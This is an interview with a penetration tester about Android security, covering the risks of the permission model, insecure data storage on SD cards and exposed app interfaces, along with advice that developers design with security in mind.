Android security from the ground up

Georgia Weidman is a penetration tester, security researcher, and trainer. She’s also one of the speakers at the upcoming HITBSecConf 2012 Amsterdam conference. In this interview she discusses the security issues on the Android platform and offers advice for application developers.

What are the most significant security issues on the Android platform today?
When I think about security issues in Android, I think not so much about significant security improvements that have taken place or flaws that have been discovered that have not been adequately mitigated. Instead I think how the functionality of Android and other smartphone platforms have and continue to evolve to require a high degree of privacy/security for users.

I like this picture of an antique phone I took in Cali, Colombia at a conference last year:

This is closer to what most end users think of when they think of an Android phone rather than what it really is. I cringe when I see an Android phone with a credit card reader attached, when I see banks sending credentials via SMS. Don’t get me wrong, that sort of functionality is really cool, but Android security just isn’t ready for the security needs of the functionality that’s available.

What advice would you give to Android developers when it comes to security? How can they make sure their applications are developed properly from the ground up?
Google has an informative page discussing security for Android Developers. Unfortunately, as with other platforms, developers, particularly new developers, don’t design with security in mind.

You know how it goes. You get this great revolutionary idea and stay up for three days without sleeping turning your vision into a reality. No one is thinking about security and that’s normal. Designing with security in mind is boring.

I studied secure software engineering in graduate school, and it had to be the most dull time of my entire life. But it’s necessary. A flaw in a game you write for Android can lead to complete compromise of all the data on a user’s smartphone. Pay better attention than I did to my graduate school professors and think about the security implications of your app’s functionality.

And read the Google Developer Security page. There should be a requirement that developers read it before they get their developers license, like taking your drivers test. You can kill people with a car, you can destroy people’s lives with an insecure app. Unfortunately, as of now, the security page isn’t even referenced in the tutorials for new developers.

While researching the Android permissions model and ways it can be bypassed, you surely came upon some very creative ways the attackers are using. Can you share some examples with our readers?
Well, one of the things that makes Android such a dynamic and interesting platform for development is its open API model. The example Android uses is if you want to take a picture you can just call an interface to the Camera app on Android devices rather than coding the nitty gritty with every phone or tablet or toaster that is running Android. Your app can call the Camera app and have it return a picture to you. Try doing some of that stuff on an iPhone and you might just find yourself beating your head against the keyboard repeatedly.

However, Android banks its security on the permission model. The idea is if an app asks for the permission to for example send an SMS message and the user approves this on install, then the app can send as many text messages as it likes. However, if the app in question does not explicitly ask the user for permission to send text messages, under no circumstances should that app be able to send a text message. Whether end users are making good decisions about app permissions is another story for another day perhaps, but what I’m dealing with here, is at what point if any does the permission model as it is break down, and why.

The first thing you should probably note is that in most situations the source code of Android apps is completely reverseable. There’s plenty of information about that out there. So as a developer you should always assume attackers know how to interact with your files and interfaces if they are made publicly available. Security through obscurity definitely does not work with Android apps.

What I looked at with my research and what I will be showing examples of at my talk at Hack in the Box Amsterdam are examples where malicious apps are able to piggyback on the permissions of apps that are coded poorly and are thus vulnerable to this sort of attack. For example, consider an application that has permissions to sensitive data, say your credentials. That’s all well and good as long as that app uses those credentials appropriately and doesn’t send them to anyone malicious or anything. But say, the developer doesn’t consider the security implications and stores those credentials on the sdcard of the Android phone. The SD card is formatted VFAT, so everything is world readable. All an attacker would need to do is find the file name from the source code and write an app to steal the information. Then that app need not have permissions to access account credentials but would still be able to access them.

For another example, lets return to text messaging. Say for example an app has the permission to send SMS messages. If that functionality is accessible via an open interface, then any app regardless of permissions can then also send SMS messages. Which takes us full circle because open interfaces are one of the things that make Android so great. But it can completely undermine the security model if developers don’t use it correctly and with security in mind.

Unlike the Apple App Store which has tight quality controls, the Android Market is much more relaxed. This enables cybercriminals to introduce Trojanized apps and cause havoc for unsuspecting users. In your opinion, what type of controls should Google put in place to make sure their users receive a suitable level of protection?
First off, do those controls stop iPhone malware from happening? Not at all. Look at Dr. Charlie Miller’s work where he actually got a malicious app accepted into the Apple App Store. Charlie Miller is possibly one of the smartest guys around, but I bet if he can do it, there are other not so ethical types up to the same sort of tricks. Apple claims 100% safety, a sort of “thou shalt not” from the mountaintop as far as malware is concerned, and that gives users a false sense of security. Malware happens. That’s just the nature of the beast. If a toaster had an IP address some bored hacker a few doors down would be burning your toast.

I think the Android Market’s stance is much more realistic. They accept that malware happens and do what they can to fix any problems that arise. I know they are moving forward with this as well, with in app store malware detection, etc. and I’m interested to see what the future holds in this area. Again malware is a hard problem. I’ll let you know when I solve it.

Don't miss